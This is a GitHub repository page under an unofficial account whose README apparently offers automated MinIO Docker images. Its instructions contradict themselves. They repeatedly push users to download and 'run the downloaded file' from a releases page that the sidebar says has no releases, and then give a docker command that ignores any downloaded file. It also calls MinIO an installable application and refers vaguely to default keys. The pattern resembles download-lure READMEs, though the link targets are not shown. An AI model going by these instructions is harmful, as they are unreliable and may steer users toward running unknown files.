Skip to content
/ minio Public

πŸ› οΈ Build and publish MinIO Docker images automatically from official releases to GitHub and Docker Hub for easy access and deployment.

Notifications You must be signed in to change notification settings

gh0sst/minio

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

20 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌟 minio - Simple Automated Storage for Everyone

πŸš€ Getting Started

Welcome to MinIO! This application helps you manage automated MinIO Docker images easily. With MinIO, you can store and retrieve data securely and efficiently.

Download MinIO

πŸ“¦ System Requirements

Before you start, ensure that your system meets these requirements:

  • Operating System: Windows 10 and above, MacOS 10.13 and above, or a modern Linux distribution.
  • Docker Installed: You need Docker already on your system. Visit Docker's website for installation instructions.
  • Storage Space: At least 1 GB of free space.

πŸ”₯ Features

  • Automated Deployment: Easily deploy Docker containers without manual setup.
  • Secure Storage: Use MinIO with built-in encryption to protect your data.
  • Scalable Infrastructure: Start small and grow as needed with performance tuning.

πŸ’Ύ Download & Install

To get started with MinIO, visit this page to download: MinIO Releases.

This page has various versions available. Choose the one that fits your system and download it. The files are usually labeled clearly, so you can find the right one easily.

Installation Steps

  1. Visit the Release Page: Click the link above or enter it into your browser.

  2. Choose Your Version: Look for the latest version to ensure you have the newest features and security updates.

  3. Download the File: Click the package suitable for your operating system.

  4. Open Your Terminal (Command Prompt or Terminal):

    • On Windows, search for "cmd" or "PowerShell".
    • On MacOS, find "Terminal" in Applications > Utilities.
    • On Linux, use your preferred terminal emulator.
  5. Run the Downloaded File: Navigate to the location where you downloaded the file. Use the following command:

    docker run -d --name minio \
    -p 9000:9000 \
    -p 9001:9001 \
    minio/minio server /data
    
  6. Access the MinIO Server: Open your web browser and go to http://localhost:9000. You should see the MinIO login screen.

  7. Log In: Use the default access and secret keys. If you need to change them, refer to the configuration guide on the MinIO documentation.

πŸ“š Documentation

For more details on configuration, features, and troubleshooting, please visit the official MinIO documentation here.

❓ Support

If you have any questions or face challenges, please reach out to the support community via the MinIO GitHub issues page. You can also find assistance on forums and sites dedicated to MinIO.

πŸŽ‰ Conclusion

MinIO greatly simplifies storing data with Docker. Follow the steps above to get started quickly. If you need help, consult the documentation or seek community support. Happy storing!

Download MinIO

About

πŸ› οΈ Build and publish MinIO Docker images automatically from official releases to GitHub and Docker Hub for easy access and deployment.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •